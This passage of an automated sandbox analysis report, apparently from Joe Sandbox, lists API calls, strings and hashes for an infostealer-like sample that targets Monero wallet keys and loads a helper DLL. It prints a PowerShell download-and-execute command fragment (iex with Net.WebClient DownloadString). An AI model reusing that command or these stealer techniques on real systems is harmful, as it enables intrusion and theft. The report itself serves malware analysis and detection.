                            • Instruction Fuzzy Hash: 0A213B7190021C9BDB24DB54CD85FE9B3B8FB48705F0085E9E609A6280DF716AC5CFD4
                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00E599C5
                            • Process32First.KERNEL32(00E4A056,00000128), ref: 00E599D9
                            • Process32Next.KERNEL32(00E4A056,00000128), ref: 00E599F2
                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00E59A4E
                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 00E59A6C
                            • CloseHandle.KERNEL32(00000000), ref: 00E59A79
                            • CloseHandle.KERNEL32(00E4A056), ref: 00E59A88
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                            • String ID:
                            • API String ID: 2696918072-0
                            • Opcode ID: c2b9fb8a229feb0e483596e434b07cb34339f49da71facd2920c08903c2991d5
                            • Instruction ID: 31ab359f9f713b3ca9f546432f329cb51c7d52678b4def296c0c1e773dea3181
                            • Opcode Fuzzy Hash: c2b9fb8a229feb0e483596e434b07cb34339f49da71facd2920c08903c2991d5
                            • Instruction Fuzzy Hash: D3212C74900218EBDB35DFA1D988BEDB7B5BB48305F0045D8E909A7285D7749EC4CF60
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E57834
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00E5783B
                            • RegOpenKeyExA.ADVAPI32(80000002,009BC8F8,00000000,00020119,00000000), ref: 00E5786D
                            • RegQueryValueExA.ADVAPI32(00000000,009CEB78,00000000,00000000,?,000000FF), ref: 00E5788E
                            • RegCloseKey.ADVAPI32(00000000), ref: 00E57898
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID: Windows 11
                            • API String ID: 3225020163-2517555085
                            • Opcode ID: 30ca3a1e4ca74f294ce2360986dea852ec2bf25d257026ae574faaf43cc9a18f
                            • Instruction ID: 386038506bfab182c1c928c2ce982cd3ee0d207d59c5ad28901ecb9f144b5adb
                            • Opcode Fuzzy Hash: 30ca3a1e4ca74f294ce2360986dea852ec2bf25d257026ae574faaf43cc9a18f
                            • Instruction Fuzzy Hash: FC014475A44304BBEB18DBD4EA4AFAEB779EB48701F004464FA54A7284D6709954CB50
                            APIs
                            • CreateFileA.KERNEL32(>=,80000000,00000003,00000000,00000003,00000080,00000000,?,00E53D3E,?), ref: 00E5948C
                            • GetFileSizeEx.KERNEL32(000000FF,>=), ref: 00E594A9
                            • CloseHandle.KERNEL32(000000FF), ref: 00E594B7
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CloseCreateHandleSize
                            • String ID: >=$>=
                            • API String ID: 1378416451-3543398223
                            • Opcode ID: 2b4508218008b164c7932e30bc1c66a369952181350d55afee13eda0104d4a21
                            • Instruction ID: d5686c01e9096b2d2dba81c826230f094d55289bbec275b743f5199548a4d4db
                            • Opcode Fuzzy Hash: 2b4508218008b164c7932e30bc1c66a369952181350d55afee13eda0104d4a21
                            • Instruction Fuzzy Hash: 7BF04439E44308FBDB24DFB0DC89F9EB7BAAB48715F10C554FA21A72C4D6709A458B40
                            APIs
                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E4A13C
                            • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00E4A161
                            • LocalAlloc.KERNEL32(00000040,?), ref: 00E4A181
                            • ReadFile.KERNEL32(000000FF,?,00000000,00E4148F,00000000), ref: 00E4A1AA
                            • LocalFree.KERNEL32(00E4148F), ref: 00E4A1E0
                            • CloseHandle.KERNEL32(000000FF), ref: 00E4A1EA
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                            • String ID:
                            • API String ID: 2311089104-0
                            • Opcode ID: 14e635a9e63c20819067c61067d843b917eb171fe4f2e50ed4c126de9f6159c4
                            • Instruction ID: d08e12de91ff0466d91fc573e8cd15f7327c7eb32abd3e042adb2b016136bbaf
                            • Opcode Fuzzy Hash: 14e635a9e63c20819067c61067d843b917eb171fe4f2e50ed4c126de9f6159c4
                            • Instruction Fuzzy Hash: 4A312CB4A41209EFDB14CFA4D985BEEB7B5BF48314F108168E911A73C0D774AA81CFA1
                            APIs
                            • lstrcat.KERNEL32(?,009CEE00), ref: 00E54A2B
                              • Part of subcall function 00E58F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00E58F9B
                            • lstrcat.KERNEL32(?,00000000), ref: 00E54A51
                            • lstrcat.KERNEL32(?,?), ref: 00E54A70
                            • lstrcat.KERNEL32(?,?), ref: 00E54A84
                            • lstrcat.KERNEL32(?,009BBDE0), ref: 00E54A97
                            • lstrcat.KERNEL32(?,?), ref: 00E54AAB
                            • lstrcat.KERNEL32(?,009CE518), ref: 00E54ABF
                              • Part of subcall function 00E5AA50: lstrcpy.KERNEL32(00E60E1A,00000000), ref: 00E5AA98
                              • Part of subcall function 00E58F20: GetFileAttributesA.KERNEL32(00000000,?,00E41B94,?,?,00E6577C,?,?,00E60E22), ref: 00E58F2F
                              • Part of subcall function 00E547C0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00E547D0
                              • Part of subcall function 00E547C0: RtlAllocateHeap.NTDLL(00000000), ref: 00E547D7
                              • Part of subcall function 00E547C0: wsprintfA.USER32 ref: 00E547F6
                              • Part of subcall function 00E547C0: FindFirstFileA.KERNEL32(?,?), ref: 00E5480D
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                            • String ID:
                            • API String ID: 2540262943-0
                            • Opcode ID: 5280e79f02420008ab15e148a65e478705285fb676b0f38e8ad229acd0d527a2
                            • Instruction ID: b9eb2b9487e102665ac0ba54e15997a6d1be848ece798bae8fa7b55e5f0551a0
                            • Opcode Fuzzy Hash: 5280e79f02420008ab15e148a65e478705285fb676b0f38e8ad229acd0d527a2
                            • Instruction Fuzzy Hash: 033184F690020867CB28FBB0DD85EDDB37CAB58701F404999B616B6085DEB497CDCB94
                            APIs
                              • Part of subcall function 00E5AA50: lstrcpy.KERNEL32(00E60E1A,00000000), ref: 00E5AA98
                              • Part of subcall function 00E5ACC0: lstrlen.KERNEL32(?,009C99B8,?,\Monero\wallet.keys,00E60E1A), ref: 00E5ACD5
                              • Part of subcall function 00E5ACC0: lstrcpy.KERNEL32(00000000), ref: 00E5AD14
                              • Part of subcall function 00E5ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E5AD22
                              • Part of subcall function 00E5AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E5AC82
                              • Part of subcall function 00E5AC30: lstrcat.KERNEL32(00000000), ref: 00E5AC92
                              • Part of subcall function 00E5ABB0: lstrcpy.KERNEL32(?,00E60E1A), ref: 00E5AC15
                            • ShellExecuteEx.SHELL32(0000003C), ref: 00E52FD5
                            Strings
                            • ')", xrefs: 00E52F03
                            • <, xrefs: 00E52F89
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00E52F54
                            • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00E52F14
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                            • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            • API String ID: 3031569214-898575020
                            • Opcode ID: c9beb32882bf68b8889b76beeb3a3bedeaba43e1cdbe63ba7dff3e253fa55408
                            • Instruction ID: 14aeb71ad528374d5770462919d05e4738f8ec371293149614abf8433a2f28be
                            • Opcode Fuzzy Hash: c9beb32882bf68b8889b76beeb3a3bedeaba43e1cdbe63ba7dff3e253fa55408
                            • Instruction Fuzzy Hash: 47411E709002089BDB14FFA0C862BDDBBB9AF14341F446A69E81576192DF712A4DCF91
                            APIs
                            • RegOpenKeyExA.ADVAPI32(80000001,009CE5F8,00000000,00020119,?), ref: 00E54344
                            • RegQueryValueExA.ADVAPI32(?,009CED58,00000000,00000000,00000000,000000FF), ref: 00E54368
                            • RegCloseKey.ADVAPI32(?), ref: 00E54372
                            • lstrcat.KERNEL32(?,00000000), ref: 00E54397
                            • lstrcat.KERNEL32(?,009CED70), ref: 00E543AB
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$CloseOpenQueryValue
                            • String ID:
                            • API String ID: 690832082-0
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: dllmain_raw$dllmain_crt_dispatch
                            • String ID:
                            • API String ID: 3136044242-0
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E57FC7
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00E57FCE
                            • RegOpenKeyExA.ADVAPI32(80000002,009BCA80,00000000,00020119,?), ref: 00E57FEE
                            • RegQueryValueExA.ADVAPI32(?,009CE458,00000000,00000000,000000FF,000000FF), ref: 00E5800F
                            • RegCloseKey.ADVAPI32(?), ref: 00E58022
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID:
                            • API String ID: 3225020163-0
                            APIs
                            • StrStrA.SHLWAPI(009CEDD0,00000000,00000000,?,00E49F71,00000000,009CEDD0,00000000), ref: 00E593FC
                            • lstrcpyn.KERNEL32(01117580,009CEDD0,009CEDD0,?,00E49F71,00000000,009CEDD0), ref: 00E59420
                            • lstrlen.KERNEL32(00000000,?,00E49F71,00000000,009CEDD0), ref: 00E59437
                            • wsprintfA.USER32 ref: 00E59457
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpynlstrlenwsprintf
                            • String ID: %s%s
                            • API String ID: 1206339513-3252725368
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E412B4
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00E412BB
                            • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00E412D7
                            • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00E412F5
                            • RegCloseKey.ADVAPI32(?), ref: 00E412FF
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID:
                            • API String ID: 3225020163-0
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: String___crt$Type
                            • String ID:
                            • API String ID: 2109742289-3916222277
                            APIs
                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00E56903
                              • Part of subcall function 00E5AA50: lstrcpy.KERNEL32(00E60E1A,00000000), ref: 00E5AA98
                              • Part of subcall function 00E5ACC0: lstrlen.KERNEL32(?,009C99B8,?,\Monero\wallet.keys,00E60E1A), ref: 00E5ACD5
                              • Part of subcall function 00E5ACC0: lstrcpy.KERNEL32(00000000), ref: 00E5AD14
                              • Part of subcall function 00E5ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E5AD22
                              • Part of subcall function 00E5ABB0: lstrcpy.KERNEL32(?,00E60E1A), ref: 00E5AC15
                            • ShellExecuteEx.SHELL32(0000003C), ref: 00E569C6
                            • ExitProcess.KERNEL32 ref: 00E569F5
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                            • String ID: <
                            • API String ID: 1148417306-4251816714
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00E60E10,00000000,?), ref: 00E589BF
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00E589C6
                            • wsprintfA.USER32 ref: 00E589E0
                              • Part of subcall function 00E5AA50: lstrcpy.KERNEL32(00E60E1A,00000000), ref: 00E5AA98
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateProcesslstrcpywsprintf
                            • String ID: %dx%d
                            • API String ID: 1695172769-2206825331
                            APIs
                            • LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00E4A098
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: LibraryLoad
                            • String ID: C:\ProgramData\chrome.dll$connect_to_websocket$free_result
                            • API String ID: 1029625771-1545816527
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00E596AE,00000000), ref: 00E58EEB
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00E58EF2
                            • wsprintfW.USER32 ref: 00E58F08
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateProcesswsprintf
                            • String ID: %hs
                            • API String ID: 769748085-2783943728
                            • Opcode ID: 4d1b87c6e2e5d1a22c634e3b64f7839ffe3bb6333ebfde472768ee432d67376c
                            • Instruction ID: 27a0d7a7beea3391bac9b1cd7d6a6f550151c350c9687db322f88bd47edd5bb5
                            • Opcode Fuzzy Hash: 4d1b87c6e2e5d1a22c634e3b64f7839ffe3bb6333ebfde472768ee432d67376c
                            • Instruction Fuzzy Hash: D8E0EC75A84309BBDB28DBD4EE0AEADB7B8EB45701F0001A4FD0997380DA719E509B91
                            APIs
                              • Part of subcall function 00E5AA50: lstrcpy.KERNEL32(00E60E1A,00000000), ref: 00E5AA98
                              • Part of subcall function 00E5ACC0: lstrlen.KERNEL32(?,009C99B8,?,\Monero\wallet.keys,00E60E1A), ref: 00E5ACD5
                              • Part of subcall function 00E5ACC0: lstrcpy.KERNEL32(00000000), ref: 00E5AD14
                              • Part of subcall function 00E5ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E5AD22
                              • Part of subcall function 00E5ABB0: lstrcpy.KERNEL32(?,00E60E1A), ref: 00E5AC15
                              • Part of subcall function 00E58CF0: GetSystemTime.KERNEL32(00E60E1B,009CB1A0,00E605B6,?,?,00E413F9,?,0000001A,00E60E1B,00000000,?,009C99B8,?,\Monero\wallet.keys,00E60E1A), ref: 00E58D16
                              • Part of subcall function 00E5AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E5AC82
                              • Part of subcall function 00E5AC30: lstrcat.KERNEL32(00000000), ref: 00E5AC92
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00E4AA11
                            • lstrlen.KERNEL32(00000000,00000000), ref: 00E4AB2F
                            • lstrlen.KERNEL32(00000000), ref: 00E4ADEC
                              • Part of subcall function 00E5AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E5AAF6
                            • DeleteFileA.KERNEL32(00000000), ref: 00E4AE73
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                            • String ID:
                            • API String ID: 211194620-0
                            • Opcode ID: a2ac0260e1629efbc8823c718b1623ca8d61b81683c0dd4c45f699a70b8f3c73
                            • Instruction ID: 6209ce1b478a248da2c710527a88a4e0921f8fec004f7ccdbfd4f038e1025b94
                            • Opcode Fuzzy Hash: a2ac0260e1629efbc8823c718b1623ca8d61b81683c0dd4c45f699a70b8f3c73
                            • Instruction Fuzzy Hash: FFE116729101089BCB54FBA4DDA2EEEB37DAF14301F449A79F51672191EF306A4CCBA1
                            APIs
                              • Part of subcall function 00E5AA50: lstrcpy.KERNEL32(00E60E1A,00000000), ref: 00E5AA98
                              • Part of subcall function 00E5ACC0: lstrlen.KERNEL32(?,009C99B8,?,\Monero\wallet.keys,00E60E1A), ref: 00E5ACD5
                              • Part of subcall function 00E5ACC0: lstrcpy.KERNEL32(00000000), ref: 00E5AD14
                              • Part of subcall function 00E5ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E5AD22
                              • Part of subcall function 00E5ABB0: lstrcpy.KERNEL32(?,00E60E1A), ref: 00E5AC15
                              • Part of subcall function 00E58CF0: GetSystemTime.KERNEL32(00E60E1B,009CB1A0,00E605B6,?,?,00E413F9,?,0000001A,00E60E1B,00000000,?,009C99B8,?,\Monero\wallet.keys,00E60E1A), ref: 00E58D16
                              • Part of subcall function 00E5AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E5AC82
                              • Part of subcall function 00E5AC30: lstrcat.KERNEL32(00000000), ref: 00E5AC92
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00E4D581
                            • lstrlen.KERNEL32(00000000), ref: 00E4D798
                            • lstrlen.KERNEL32(00000000), ref: 00E4D7AC
                            • DeleteFileA.KERNEL32(00000000), ref: 00E4D82B
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                            • String ID:
                            • API String ID: 211194620-0
                            • Opcode ID: 03670283e105eec6a1c37f4b1548a51df0c1856bf54a3d4c2ff23c583a8ed825
                            • Instruction ID: 42126f06ba2ff22e8f431e0289984ed1b5ced58f1d7520b3dd66291a1d15590a
                            • Opcode Fuzzy Hash: 03670283e105eec6a1c37f4b1548a51df0c1856bf54a3d4c2ff23c583a8ed825
                            • Instruction Fuzzy Hash: DB9107729101089BCB18FBA4DD62DEEB379AF14301F545A79F91772191EF306A4CCBA2
                            APIs
                              • Part of subcall function 00E5AA50: lstrcpy.KERNEL32(00E60E1A,00000000), ref: 00E5AA98
                              • Part of subcall function 00E5ACC0: lstrlen.KERNEL32(?,009C99B8,?,\Monero\wallet.keys,00E60E1A), ref: 00E5ACD5
                              • Part of subcall function 00E5ACC0: lstrcpy.KERNEL32(00000000), ref: 00E5AD14
                              • Part of subcall function 00E5ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E5AD22
                              • Part of subcall function 00E5ABB0: lstrcpy.KERNEL32(?,00E60E1A), ref: 00E5AC15
                              • Part of subcall function 00E58CF0: GetSystemTime.KERNEL32(00E60E1B,009CB1A0,00E605B6,?,?,00E413F9,?,0000001A,00E60E1B,00000000,?,009C99B8,?,\Monero\wallet.keys,00E60E1A), ref: 00E58D16
                              • Part of subcall function 00E5AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E5AC82
                              • Part of subcall function 00E5AC30: lstrcat.KERNEL32(00000000), ref: 00E5AC92
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00E4D901
                            • lstrlen.KERNEL32(00000000), ref: 00E4DA9F
                            • lstrlen.KERNEL32(00000000), ref: 00E4DAB3
                            • DeleteFileA.KERNEL32(00000000), ref: 00E4DB32
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                            • String ID:
                            • API String ID: 211194620-0
                            • Opcode ID: 74fd524ee65cd34bccfaad4adac1fdd19793b0eba6ac74a4a06b2a5934fc5ec2
                            • Instruction ID: 5b5cc2d1427f9406564d83b14cc849791489911b77311df31ee8723f6ccadba8
                            • Opcode Fuzzy Hash: 74fd524ee65cd34bccfaad4adac1fdd19793b0eba6ac74a4a06b2a5934fc5ec2
                            • Instruction Fuzzy Hash: 2A8116729101089BCF14FBA4DDA6DEEB379AF14301F445A79F91672191EF306A4CCBA2
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmp
